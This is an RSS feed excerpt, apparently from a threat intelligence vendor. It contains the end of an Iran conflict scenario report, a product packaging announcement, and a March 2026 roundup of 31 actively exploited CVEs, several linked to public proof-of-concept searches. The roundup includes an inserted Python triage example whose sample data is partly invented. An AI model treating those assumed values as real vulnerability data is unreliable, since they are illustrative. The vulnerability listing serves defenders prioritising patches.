              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f76e8d0ed0b303d248403a2219cbf67447bf89b9.png?width=750&amp;format=png&amp;optimize=medium" width="664" height="374" />
            </div>
          </div>
          <div>
            <div><strong>Figure 13:</strong> Mass protests against the regime in December 2025 were brutally repressed (Source: <a href="https://www.lemonde.fr/en/international/article/2026/01/09/iran-cuts-internet-as-protest-movement-against-regime-grows_6749254_4.html#">Le Monde</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15426b985b3d8912decf5b57a8bf69dcca736409f.png?width=750&amp;format=png&amp;optimize=medium" width="900" height="505" />
            </div>
          </div>
          <div>
            <div><strong>Figure 14:</strong> Displaced Syrians have lived in refugee camps for ten years, demonstrating the long-term impacts of internal conflict (Source: <a href="https://www.unhcr.org/news/stories/jordans-zaatari-refugee-camp-10-facts-10-years">UNHCR</a>)</div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>The Islamic Republic collapses, plunging the country into a civil war and complex humanitarian crisis.</strong></p>
        <p>The US and Israel’s persistent “decapitation strategy” weakens the regime to the point where it is no longer able to assert internal control. With no viable alternative, the country falls into a multiparty civil war made up of pro-regime, pro-democracy, and assorted regional and ideological militias. Food and fuel shortages are severe in certain regions. Refugee camps are built in Iraq while Europe’s asylum system faces overwhelming demands. The US claims Kharg Island in the chaos and asserts control over the Strait of Hormuz, mitigating international economic damage. However, the political instability gives pro-regime and other ideological groups a base for asymmetric operations, leading to persistent regional disruption. Cyber capabilities degrade amid internal fighting, though some hacktivist operations persist against a wider variety of ideological enemies. Damage to water and energy facilities sustained during the conflict exacerbates humanitarian crisis and slows recovery. Russia supplies military support to pro-regime factions, but not enough to significantly tilt the balance of power.</p>
        <h3>Likelihood</h3>
        <p><strong>The long-term resilience of the regime and the viability of alternatives are unknown</strong>, making it difficult to assess likelihood with confidence.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Reduced reliability of just-in-time inventory models, especially for firms dependent on Gulf maritime corridors</div>
            <div><strong>Segment critical operations</strong></div>
          </div>
          <div>
            <div><strong>Financial:</strong> Long-term increase in operational and energy costs</div>
            <div><strong>Harden sanctions</strong> and third-party controls</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Larger firms use stronger government relationships or balance sheets to secure logistics</div>
            <div>Require an <strong>immediate review of regional dependencies,</strong> with backup routing and alternate sourcing plans for critical business lines</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Export-control failures involving dual-use goods, technology, industrial inputs, or cyber tools</div>
            <div>Ensure <strong>employee protection measures</strong> are ready across the region</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Activist or online campaigns tying the firm to foreign intervention or opportunism</div>
            <div>Create a <strong>90-day resilience plan</strong> including decision triggers for escalation or market withdrawal</div>
          </div>
        </div>
        <h2>Wildcard Scenario 3: Nuclear Crisis</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Protracted high-intensity conflict <strong>-&gt; Increased likelihood of miscalculation</strong></li>
          <li>Location of facility <strong>-&gt; Risks of radiological contamination spread by air and water</strong></li>
          <li>Diplomatic failures <strong>-&gt; Inability to coordinate on response</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11b53b765492fc8b26c103c37690c25df9c8cb78b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 15:</strong></em> <em>Bushehr has not yet been a direct target, though missiles have landed near it (Source:</em> <em><a href="https://www.developmentaid.org/news-stream/post/205823/iaea-grossi-bushehr-nuclear-plant-attack-iran-safety-concern-2026">Development Aid</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1d81874eed5075ce08a2b37cbf7d2815150e3f685.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="692" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 16:</strong></em> <em>Weather patterns following the Chernobyl nuclear disaster spread radiological material affecting up to 6 million people (Source:</em> <em><a href="https://www.unscear.org/unscear/en/publications/2024_2.html">UNSCEAR</a>)</em></div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>Missile strikes hitting a nuclear facility lead to a radiological incident, causing immediate global shock and rapid escalation.</strong></p>
        <p>A missile strike causes extensive damage to Iran’s Bushehr civilian nuclear power facility, resulting in a radiological release with cross-border contamination. This occurs through escalation, miscalculation, or degraded command and control. Immediate impacts include evacuation zones and disruption to regional energy supply. Emergency response efforts are delayed by ongoing conflict, limiting containment and extending environmental and economic damage. As a result, southern Iran and the Gulf States experience long-term harm to drinking water supplies and maritime food sources. The conflict also prevents sustained monitoring inside Iran, which extends the health and environmental damage from inadvertent exposure. Contamination further restricts maritime trade routes in the Gulf, while energy markets react sharply to both supply disruption and elevated systemic risk. Cyber and information operations amplify panic and misinformation.</p>
        <h3>Likelihood</h3>
        <p><strong>Low probability, high impact:</strong> Risk of intentional or unintended strike increases under sustained conflict.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Disruption to regional operations and supply chains; site closures</div>
            <div>Activate <strong>crisis management</strong> and continuity protocols</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Extreme market volatility and energy price spikes</div>
            <div>Protect personnel and <strong>account for regional workforce exposure</strong></div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Firms with geographic diversification gain advantage</div>
            <div>Secure critical systems and <strong>prepare for sustained disruption</strong></div>
          </div>
          <div>
            <div><strong>Legal:</strong> Emergency regulations, sanctions, and liability exposure increase</div>
            <div>Identify <strong>alternative routes</strong> and supply chain contingencies</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Heightened scrutiny around safety, workforce protection, and response</div>
            <div><strong>Manage disinformation</strong> through strong crisis communications process</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1627d52be2bcdad9118913daf3e68f8df1cb60111.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[A New Way to Buy Recorded Future: Solutions and Packages Built for the 2026 Threat Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-solutions-packages</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-solutions-packages</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is rolling out new pricing and packaging that bundles its intelligence capabilities into four solutions and three tiered plans, with unlimited users and integrations included.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Recorded Future is now offering four solutions covering cyber operations, digital risk protection, third-party risk, and payment fraud.</li>
                <li>Three tiered packages (Core, Professional, Elite) bundle these solutions to scale with an organization's security program.</li>
                <li>Packages include unlimited users and integrations so intelligence reaches everyone who needs it.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>The global threat landscape didn't simplify in 2025. It shattered. Recorded Future's Insikt Group® <a href="https://www.recordedfuture.com/ko/research/state-of-security#download-the-full-report">2026 State of Security</a> documented how geopolitical fragmentation, state-sponsored operations, and criminal ecosystem adaptation reshaped global risk. Threats that once stayed in distinct lanes converged, and they converged fast.</p>
        <p>Consider what Insikt Group® tracked last year:</p>
        <ul>
          <li>State-sponsored cyber actors shifted from intelligence collection to persistent access, pre-positioning inside target infrastructure so they can disrupt operations the moment geopolitical tensions escalate.</li>
          <li>Weak governance and systemic corruption <a href="https://www.cnn.com/2026/01/04/asia/china-myanmar-scam-crime-families-intl-hnk-dst">fueled</a> industrialized cybercrime, enabling payment fraud and criminal operations to scale like legitimate businesses.</li>
          <li>Influence operators and hacktivist groups multiplied alongside rising interstate conflict, amplifying fear, uncertainty, and doubt through exaggerated exploit claims.</li>
          <li>Loosely organized criminal collectives used social engineering to compromise third-party SaaS platforms, rapidly adapting to law enforcement action and traditional defenses alike.</li>
        </ul>
        <p>The risk surface has expanded well beyond networks and endpoints. Your brand, your third-party vendors, your payment networks: each has its own threat actors, its own attack methods, and its own intelligence requirements. Yet most intelligence programs only cover one of these domains. Or they monitor them in silos, with no shared context.</p>
        <p>The right intelligence, from the right sources, at the right time, is a critical competitive advantage. But intelligence only matters if you can act on it across every critical risk domain before attackers reach their objective.</p>
        <h2>Re-Imagining How Intelligence Is Delivered And Operationalized</h2>
        <p>Historically, Recorded Future has been sold on a <strong>per-user</strong> and <strong>per-capability</strong> basis - a model that worked well in a simpler world where security teams were focused on solving the most urgent problem in front of them.</p>
        <p>Today’s threat landscape is <strong>fast, more complex, and deeply interconnected</strong>. Customers are no longer looking for point solutions, they’re asking for a fundamentally different way to consume and operationalize intelligence.</p>
        <p>Customers are asking us to provide:</p>
        <ul>
          <li>Complete capabilities to support use cases aligned with core risk domains.</li>
          <li>Democratized access to intelligence across teams, workflows and systems.</li>
          <li>A simplified and predictable way to purchase for ease of budgeting and adoption.</li>
        </ul>
        <p>In response, we’ve re-imagined how Recorded Future is delivered:</p>
        <p><strong>“Four Solutions. Three Packages. One Intelligence Foundation.”</strong></p>
        <p>A unified approach designed to scale with your organization, accelerate time to value, and embed intelligence into every decision that matters.</p>
        <h2>Four Solutions for Four Critical Risk Domains</h2>
        <p>Your threats span your infrastructure, your brand, your vendors, and your payment networks. Your intelligence should too. We’ve re-organized our platform into <a href="https://www.recordedfuture.com/ko/solutions-overview">four purpose-built solutions</a> tied to distinct domains of enterprise risk.</p>
        <p><strong>Cyber Operations</strong> gives your security team the intelligence, workflows, and autonomous actions to detect, investigate, and respond to threats targeting your infrastructure. Alert triage, real-world vulnerability prioritization, malware analysis, proactive hunting: this is where reactive firefighting becomes predictive, intelligence-led defense.</p>
        <p><strong>Digital Risk Protection</strong> helps detect and disrupt threats that never touch your network but directly damage your business: brand impersonation, domain abuse, credential leaks, and phishing infrastructure across the open, deep, and dark web. With access to active infostealer logs and automated IAM remediation, your team can act on exposures within hours, not weeks.</p>
        <p><strong>Third-Party Risk</strong> delivers continuous, intelligence-driven monitoring of your vendor ecosystem. Security ratings combined with real-time threat intelligence surface breaches, ransomware activity, and dark web exposure days or weeks before formal vendor notification, giving your security and GRC teams evidence they can act on and defend to stakeholders.</p>
        <p><strong>Payment Fraud Intelligence</strong> identifies stolen payment cards, compromised checks, scam merchants, and web-skimming activity earlier in the fraud lifecycle, so financial institutions can stop losses before they materialize.</p>
        <p>Each solution delivers complete, end-to-end capability for its risk domain. And because all four run on the same Intelligence Graph®, a signal detected in one domain immediately enriches context across the others.</p>
        <h2>Three Packages That Scale With Your Program</h2>
        <p>Modern organizations operate across multiple risk domains. We are introducing three packages that reflect that reality, meeting customers where they are and scaling as their programs mature.</p>
        <ul>
          <li><strong>Core</strong> is the foundation for intelligence-led security. It enables organizations to tackle essential use cases on day one - threat detection and alert triage, vulnerability monitoring, credential exposure detection, domain abuse monitoring, and executive impersonation protection. The package combines capabilities across Cyber Operations and Digital Risk Protection solutions, providing immediate, high-impact coverage.</li>
          <li><strong>Professional</strong> is built for organizations ready to mature their program and operationalize intelligence at scale. Building on Core, it introduces deeper insights and automation to extend team capacity - enabling autonomous threat hunting, multi-source correlation, and external asset discovery. The result is broader coverage, faster response, and more leverage for security teams without adding headcount.</li>
          <li><strong>Elite</strong> delivers the most comprehensive intelligence coverage available. By unifying Cyber Operations, Digital Risk Protection, and Third-Party Risk, it provides a complete view of risk across infrastructure, brand, and supply chain. With a single pane of glass, Elite operationalizes intelligence across workflows and teams—from CTI to SOC to Risk—driving smarter and faster risk-enabled decision making and response.</li>
        </ul>
        <p>Across all packages, customers get full access to the Intelligence Graph®, Recorded Future AI, all compatible integrations, APIs, and Collective Insights. No hidden costs or barriers to connect to your existing security stack.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12b2d0d3fac0e2942d3f007ce5150af9dbad58272.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="886" />
        </p>
        <h2>Built for Everyone Who Needs Intelligence, Not Just Analysts</h2>
        <p>Intelligence only creates value when the right people can act on it. That's why our platform packages include unlimited users. Every analyst, every engineer, every stakeholder who needs intelligence gets it, with no seat limits and no trade-offs about who gets access.</p>
        <p>For smaller teams building early-stage programs, we still offer flexible user-based licensing so you can start where it makes sense and expand as your program matures. Either way, pricing is predictable. You know what you're paying, and you can scale with confidence.</p>
        <p>Every package also includes unlimited integrations from Recorded Future’s hundreds of supported applications at no additional cost. Your SIEMs, EDRs, SOAR platforms, and ticketing systems all get equipped with real-time intelligence, so every analyst and engineer working in those tools benefits from enriched context without switching screens. Add Autonomous Threat Operations, and those same integrations become the foundation for autonomous hunting, detection, and prevention across your entire stack. Connected tools become an intelligence-led defense system that acts continuously, with minimal human intervention.</p>
        <h2>One Intelligence Foundation Across Every Domain</h2>
        <p>What makes this approach powerful isn't just simpler packaging. All four solutions and all three packages run on the same intelligence foundation: the Intelligence Graph®, correlating over 1.2 million sources and 26 billion entities across cyber, digital, third-party, and fraud domains.</p>
        <p>A credential leak detected in Digital Risk Protection immediately informs a Cyber Operations investigation. A vulnerability under active exploitation triggers prioritized patching in your workflow. A third-party vendor breach surfaces before the vendor discloses it. Intelligence flows across your entire risk surface, giving you the correlated, high-confidence context that point solutions can't deliver.</p>
        <p>That's what it means to be intelligence-led. Not consuming more data. Connecting signals across domains so you can act earlier, with greater confidence, at machine speed.</p>
        <h2>The Path Forward</h2>
        <p>Adversaries in 2026 are faster, more coordinated, and more resourceful than they've ever been. They operate across every attack surface simultaneously, and they're accelerating.</p>
        <p>Whether you're a team of three building your first intelligence program or a global enterprise running intelligence-led autonomous operations, there's a clear path. Start with the solution or package that matches your priorities today. Grow into deeper automation and broader coverage as your program matures. And at every step, you're backed by the most comprehensive and independent intelligence platform in the industry.</p>
        <p>We built this for the threats you're facing right now, and the ones coming next.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_1e8bfe6c30d46a0a069c153bdd14cca201642a2b4.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day]]></title>
            <link>https://www.recordedfuture.com/ko/blog/march-2026-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/march-2026-cve-landscape</guid>
            <pubDate>Mon, 13 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[March 2026 saw a 139% increase in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 31 vulnerabilities requiring immediate remediation, up from 13 in February 2026.]]></description>
            <content:encoded><![CDATA[
        <p>In March 2026, <a href="https://www.recordedfuture.com/ko/research/insikt-group">Insikt Group®</a> identified <strong>31 high-impact vulnerabilities that should be prioritized for remediation</strong>, 29 of which had a Very Critical Recorded Future Risk Score.</p>
        <p>These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.</p>
        <p>One vulnerability (<a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview?organization=uhash%3A5cJsHMHeSM">CVE-2017-7921</a> affecting Hikvision) is approximately nine years old, reinforcing how <strong>attackers continue to exploit long-known weaknesses in environments where patching has lagged</strong>. Legacy and unpatched systems remain attractive targets. Defenders should not discount older CVEs; instead, they should prioritize based on observed activity, maintain strong asset visibility, and apply compensating controls where remediation is not possible.</p>
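        <p>To make the prioritization rule above concrete, here is an added example (not Recorded Future's code or its risk-scoring method) of an exploitation-first triage routine. The CVE IDs and vendors come from this month's table; everything else in the sample records (whether an asset is exposed, whether a patch is available, and the risk score and PoC flag for CVE-2017-7921) is constructed for the illustration. The point it demonstrates is that the age of a CVE only annotates the action; it never lowers the tier when exploitation has been observed against an exposed asset.</p>

```python
"""Exploitation-first CVE triage.

Added illustration, not Recorded Future's code or scoring logic. The CVE IDs
and vendors come from the March 2026 table on this page; every other field
(asset exposure, patch availability, the risk score and PoC flag for
CVE-2017-7921) is constructed for the example.
"""
from dataclasses import dataclass
import re

CVE_RE = re.compile(r"^CVE-(\d{4})-\d{4,}$")
TIER_ORDER = {"P1": 0, "P2": 1, "P3": 2, "P4": 3}
LEGACY_YEARS = 5  # assumed threshold for flagging a CVE as "legacy"


@dataclass(frozen=True)
class Finding:
    cve: str
    vendor: str
    risk_score: int          # 0-99 risk score from the intel feed
    exploited_in_wild: bool  # exploitation observed this reporting period
    public_poc: bool         # public proof-of-concept identified
    asset_exposed: bool      # our asset inventory says we run the product
    patch_available: bool    # vendor fix exists for our deployed version


def cve_year(cve: str) -> int:
    """Year component of a CVE ID; used only to flag age, never to deprioritize."""
    m = CVE_RE.match(cve)
    if not m:
        raise ValueError(f"not a CVE identifier: {cve}")
    return int(m.group(1))


def triage(f: Finding, current_year: int = 2026) -> tuple[str, str]:
    """Return (tier, action).

    Age never lowers the tier: observed exploitation and asset exposure
    drive it, so a nine-year-old CVE that is still being exploited lands
    in P1 alongside this month's zero-days.
    """
    if not f.asset_exposed:
        return "P4", "track only: no exposed asset in inventory"
    if f.exploited_in_wild:
        tier = "P1"
    elif f.public_poc or f.risk_score >= 90:
        tier = "P2"
    else:
        tier = "P3"
    if f.patch_available:
        action = "patch within SLA"
    else:
        action = "apply compensating controls: isolate, restrict management interfaces, monitor"
    age = current_year - cve_year(f.cve)
    if age >= LEGACY_YEARS:
        action += f"; legacy CVE ({age} years old), verify remediation rather than assume it"
    return tier, action


def rank(findings: list[Finding]) -> list[Finding]:
    """Order by tier, then risk score (descending), then CVE ID for determinism."""
    return sorted(findings, key=lambda f: (TIER_ORDER[triage(f)[0]], -f.risk_score, f.cve))


# Constructed sample: IDs/vendors from the page, environment fields assumed.
SAMPLE = [
    Finding("CVE-2026-20131", "Cisco Secure Firewall Management Center", 99, True, True, True, True),
    Finding("CVE-2026-21262", "Microsoft SQL Server", 99, True, False, False, True),
    Finding("CVE-2026-3909", "Google Skia", 99, True, False, True, True),
    # risk score and PoC flag assumed; an unpatchable end-of-life camera is assumed
    Finding("CVE-2017-7921", "Hikvision", 99, True, True, True, False),
]

if __name__ == "__main__":
    for f in rank(SAMPLE):
        tier, action = triage(f)
        print(f"{tier}  {f.cve:<16} {f.vendor:<40} {action}")
```

        <p>Run as-is, the Hikvision CVE ranks in P1 with the current Cisco and Google entries, and its action line calls for compensating controls because no patch is assumed to exist; the SQL Server entry drops to P4 only because the constructed inventory says it is not deployed. Swapping in real inventory and patch data is the only change needed to use the same ordering on a live feed.</p>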
        <p>In March, Insikt Group® created Nuclei templates for a high-severity path traversal vulnerability in MindsDB (CVE-2026-27483) and a critical missing authentication vulnerability in Nginx UI (CVE-2026-27944). Additionally, Insikt Group® had already published a Nuclei template for <a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a> (n8n) in December, prior to its exploitation this month. We also identified public proof-of-concept (PoC) exploits for 10 of the 31 vulnerabilities.</p>
        <h2>Quick Reference: March 2026 Vulnerability Table</h2>
        <p><em>All 31 vulnerabilities below were actively exploited in March 2026. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Affected Vendor/Product</strong></div>
            <div><strong>Vulnerability Type/Component</strong></div>
            <div><strong>Public PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFRKHY5/overview">CVE-2026-20131</a></div>
            <div>99</div>
            <div>Cisco Secure Firewall Management Center (FMC)</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/search?q=CVE-2026-20131&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>2</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBpjQ/insikt-group">CVE-2026-21262</a></div>
            <div>99</div>
            <div>Microsoft SQL Server (2016 SP3, 2017, 2019, 2022, 2025)</div>
            <div>CWE-284 (Improper Access Control)</div>
            <div>No</div>
          </div>
          <div>
            <div>3</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFn9MQ7/overview">CVE-2026-26127</a></div>
            <div>99</div>
            <div>Microsoft .NET (9.0, 10.0) and Microsoft.Bcl.Memory</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div>No</div>
          </div>
          <div>
            <div>4</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDX4YdD/overview">CVE-2026-3909</a></div>
            <div>99</div>
            <div>Google Skia</div>
            <div>CWE-787 (Out-of-bounds Write)</div>
            <div>No</div>
          </div>
          <div>
            <div>5</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDYGD9W/overview">CVE-2026-3910</a></div>
            <div>99</div>
            <div>Google Chromium V8</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>6</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDuduqq/overview">CVE-2026-3564</a></div>
            <div>99</div>
            <div>ConnectWise ScreenConnect</div>
            <div>CWE-347 (Improper Verification of Cryptographic Signature)</div>
            <div>No</div>
          </div>
          <div>
            <div>7</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGDkG7T/overview">CVE-2026-33017</a></div>
            <div>99</div>
            <div>Langflow</div>
            <div>CWE-94 (Code Injection), CWE-95 (Eval Injection), CWE-306 (Missing Authentication for Critical Function)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33017&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>8</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC_b0iQ/overview">CVE-2026-3055</a></div>
            <div>99</div>
            <div>Citrix NetScaler</div>
            <div>CWE-125 (Out-of-bounds Read)</div>
            <div><a href="https://github.com/search?q=CVE-2026-3055&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>9</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGZlyzi/overview">CVE-2026-33634</a></div>
            <div>99</div>
            <div>Aquasecurity Trivy</div>
            <div>CWE-506 (Embedded Malicious Code)</div>
            <div><a href="https://github.com/search?q=CVE-2026-33634&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>10</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFoBple/overview">CVE-2026-25187</a></div>
            <div>94</div>
            <div>Microsoft Windows</div>
            <div>CWE-59 (Link Following)</div>
            <div>No</div>
          </div>
          <div>
            <div>11</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BGyXkVZ/overview">CVE-2026-33032</a></div>
            <div>94</div>
            <div>Nginx UI</div>
            <div>CWE-306 (Missing Authentication for Critical Function)</div>
            <div>No</div>
          </div>
          <div>
            <div>12</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BFJwFWu/overview">CVE-2026-21385</a></div>
            <div>89</div>
            <div>Qualcomm (Multiple Chipsets)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>13</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/_YufFK/overview">CVE-2025-53521</a></div>
            <div>99</div>
            <div>F5 BIG-IP</div>
            <div>CWE-121 (Stack-based Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>14</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5GY7RL/overview">CVE-2025-32432</a></div>
            <div>99</div>
            <div>Craft CMS</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-32432&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>15</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/8EgOyF/overview">CVE-2025-54068</a></div>
            <div>99</div>
            <div>Laravel Livewire</div>
            <div>CWE-94 (Code Injection)</div>
            <div><a href="https://github.com/search?q=CVE-2025-54068&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>16</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0AQh/overview">CVE-2025-43510</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-667 (Improper Locking)</div>
            <div>No</div>
          </div>
          <div>
            <div>17</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5R0IDa/overview">CVE-2025-43520</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-120 (Classic Buffer Overflow)</div>
            <div>No</div>
          </div>
          <div>
            <div>18</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/4vXkLn/overview">CVE-2025-31277</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)</div>
            <div>No</div>
          </div>
          <div>
            <div>19</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BCABqPu/overview">CVE-2025-66376</a></div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>CWE-79 (Cross-site Scripting)</div>
            <div>No</div>
          </div>
          <div>
            <div>20</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BC79ud1/overview">CVE-2026-20963</a></div>
            <div>99</div>
            <div>Microsoft SharePoint</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div><a href="https://github.com/jenniferreire26/CVE-2026-20963">Yes</a></div>
          </div>
          <div>
            <div>21</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/5913NU/overview">CVE-2025-47813</a></div>
            <div>99</div>
            <div>Wing FTP Server</div>
            <div>CWE-209 (Generation of Error Message Containing Sensitive Information)</div>
            <div>No</div>
          </div>
          <div>
            <div>22</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BBzIRBQ/overview">CVE-2025-68613</a></div>
            <div>99</div>
            <div>n8n</div>
            <div>CWE-913 (Improper Control of Dynamically-Managed Code Resources)</div>
            <div><a href="https://github.com/search?q=CVE-2025-68613&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>23</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/k5mef6/overview">CVE-2021-22054</a></div>
            <div>99</div>
            <div>Omnissa Workspace One UEM</div>
            <div>CWE-918 (SSRF)</div>
            <div><a href="https://github.com/MKSx/CVE-2021-22054">Yes</a></div>
          </div>
          <div>
            <div>24</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/3LwTz8/overview">CVE-2025-26399</a></div>
            <div>99</div>
            <div>SolarWinds Web Help Desk</div>
            <div>CWE-502 (Deserialization of Untrusted Data)</div>
            <div>No</div>
          </div>
          <div>
            <div>25</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BDPo5zB/overview">CVE-2026-1603</a></div>
            <div>99</div>
            <div>Ivanti Endpoint Manager (EPM)</div>
            <div>CWE-288 (Authentication Bypass Using an Alternate Path or Channel)</div>
            <div>No</div>
          </div>
          <div>
            <div>26</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/TKKaG7/overview">CVE-2017-7921</a></div>
            <div>99</div>
            <div>Hikvision (Multiple Products)</div>
            <div>CWE-287 (Improper Authentication)</div>
            <div><a href="https://github.com/search?q=CVE-2017-7921&amp;type=repositories">Yes</a></div>
          </div>
          <div>
            <div>27</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/hZXl2g/overview">CVE-2021-22681</a></div>
            <div>99</div>
            <div>Rockwell (Multiple Products)</div>
            <div>CWE-522 (Insufficiently Protected Credentials)</div>
            <div>No</div>
          </div>
          <div>
            <div>28</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/ssAv1Q/overview">CVE-2023-43000</a></div>
            <div>99</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>29</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/lEMfcP/overview">CVE-2021-30952</a></div>
            <div>92</div>
            <div>Apple (Multiple Products)</div>
            <div>CWE-190 (Integer Overflow or Wraparound)</div>
            <div>No</div>
          </div>
          <div>
            <div>30</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/t5YiER/overview">CVE-2023-41974</a></div>
            <div>99</div>
            <div>Apple iOS and iPadOS</div>
            <div>CWE-416 (Use After Free)</div>
            <div>No</div>
          </div>
          <div>
            <div>31</div>
            <div><a href="https://app.recordedfuture.com/portal/intelligence-card/BEwAt0u/overview">CVE-2026-22719</a></div>
            <div>89</div>
            <div>Broadcom VMware Aria Operations</div>
            <div>CWE-77 (Command Injection)</div>
            <div>No</div>
          </div>
